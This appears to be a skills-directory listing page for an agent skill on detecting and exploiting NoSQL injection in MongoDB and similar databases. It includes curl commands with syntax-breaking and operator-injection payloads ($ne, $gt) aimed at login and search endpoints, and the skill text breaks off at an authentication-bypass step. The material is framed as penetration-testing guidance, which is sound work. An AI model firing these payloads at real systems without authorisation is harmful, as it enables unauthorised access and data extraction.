exploiting-nosql-injection-vulnerabilities

Featured

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

API & Backend 12,642 stars 1468 forks Updated today Apache-2.0

Install

View on GitHub

Quality Score: 99/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# Exploiting NoSQL Injection Vulnerabilities ## When to Use - During web application penetration testing of applications using NoSQL databases - When testing authentication mechanisms backed by MongoDB or similar databases - When assessing APIs that accept JSON input for database queries - During bug bounty hunting on applications with NoSQL backends - When performing security code review of database query construction ## Prerequisites - Burp Suite Professional or Community Edition with JSON support - NoSQLMap tool installed (`pip install nosqlmap` or from GitHub) - Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists) - Target application using a NoSQL database (MongoDB, CouchDB, Cassandra) - Proxy configured for HTTP traffic interception - Python 3.x for custom payload scripting ## Workflow ### Step 1 — Identify NoSQL Injection Points ```bash # Look for JSON-based login forms or API endpoints # Common indicators: application accepts JSON POST bodies, uses MongoDB # Test with basic syntax-breaking characters curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin\"", "password": "test"}' # Test for operator injection in query parameters curl "http://target.com/api/users?username[$ne]=invalid" # Check for error-based detection curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"query": {"$gt": ""}}' ``` ### Step 2 — Perform Authentication Bypass ```bash #...

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Integrates with

MongoDB · Database

Similar Skills

Semantically similar based on skill content — not just same category

API & Backend Listed

exploiting-nosql-injection-vulnerabilities

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

6 Updated today
26zl
API & Backend Featured

exploiting-sql-injection-vulnerabilities

Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap. The tester detects injection points through error-based, union-based, blind boolean, and time-based blind techniques across all major database engines (MySQL, PostgreSQL, MSSQL, Oracle) to demonstrate data extraction, authentication bypass, and potential remote code execution. Activates for requests involving SQL injection testing, SQLi exploitation, database security assessment, or injection vulnerability verification.

12,642 Updated today
mukul975
API & Backend Featured

exploiting-api-injection-vulnerabilities

Tests APIs for injection vulnerabilities including SQL injection, NoSQL injection, OS command injection, LDAP injection, and Server-Side Request Forgery (SSRF) through API parameters, headers, and request bodies. The tester crafts malicious payloads targeting different backend technologies and injection contexts to extract data, execute commands, or access internal services. Maps to OWASP API8:2023 Security Misconfiguration and API7:2023 SSRF. Activates for requests involving API injection testing, SQLi in APIs, NoSQL injection, SSRF testing, or API input validation assessment.

12,642 Updated today
mukul975
AI & Automation Featured

exploiting-sql-injection-with-sqlmap

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.

12,642 Updated today
mukul975
API & Backend Solid

hunt-sqli

Hunting skill for sqli vulnerabilities. Built from 12 public bug bounty reports including modern NoSQL injection (Rocket.Chat CVE-2021-22911 MongoDB $regex, Mongoose ORM CVE-2024-53900 $where bypass), modern ORM raw-fragment SQLi (Django CVE-2024-42005, Sequelize GHSA-wrh9-cjv3-2hpw), second-order SOQL injection (HackerOne Salesforce), time-based blind SQLi in GraphQL resolvers, and SQLi on OIDC-proxy backends. Use when hunting SQLi / NoSQLi on any target.

1,380 Updated 4 days ago
elementalsouls